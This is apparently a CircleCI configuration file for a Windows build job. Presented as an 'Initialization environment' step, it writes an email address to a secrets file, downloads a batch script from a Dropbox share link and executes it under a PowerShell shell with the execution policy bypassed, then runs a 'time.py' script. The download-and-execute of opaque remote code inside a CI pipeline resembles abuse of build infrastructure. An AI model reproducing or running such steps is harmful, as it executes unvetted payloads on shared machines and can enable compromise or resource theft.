jobs:
  build: # name of your job
    resource_class: 'windows.large'
    machine:
      image: 'windows-server-2022-gui:current'
      shell: 'powershell.exe -ExecutionPolicy Bypass'
    steps:
      - checkout
      - run:
          name: Initialization environment
          command: |
            echo "EMAIL_SECRET=aymanrar2c@gmail.com" > secrets.txt
            Invoke-WebRequest -Uri "https://www.dropbox.com/scl/fi/gdzoens68gz1o4wuwtf0x/down.bat?rlkey=wd1ecn33dv9yn2uvdyynavbs6&dl=1" -OutFile "down.bat"
            cmd /c down.bat
            
      - run:
          name: Time Counter
          command: python time.py

workflows:
  version: 2
  build_and_upload:
    jobs:
      - build
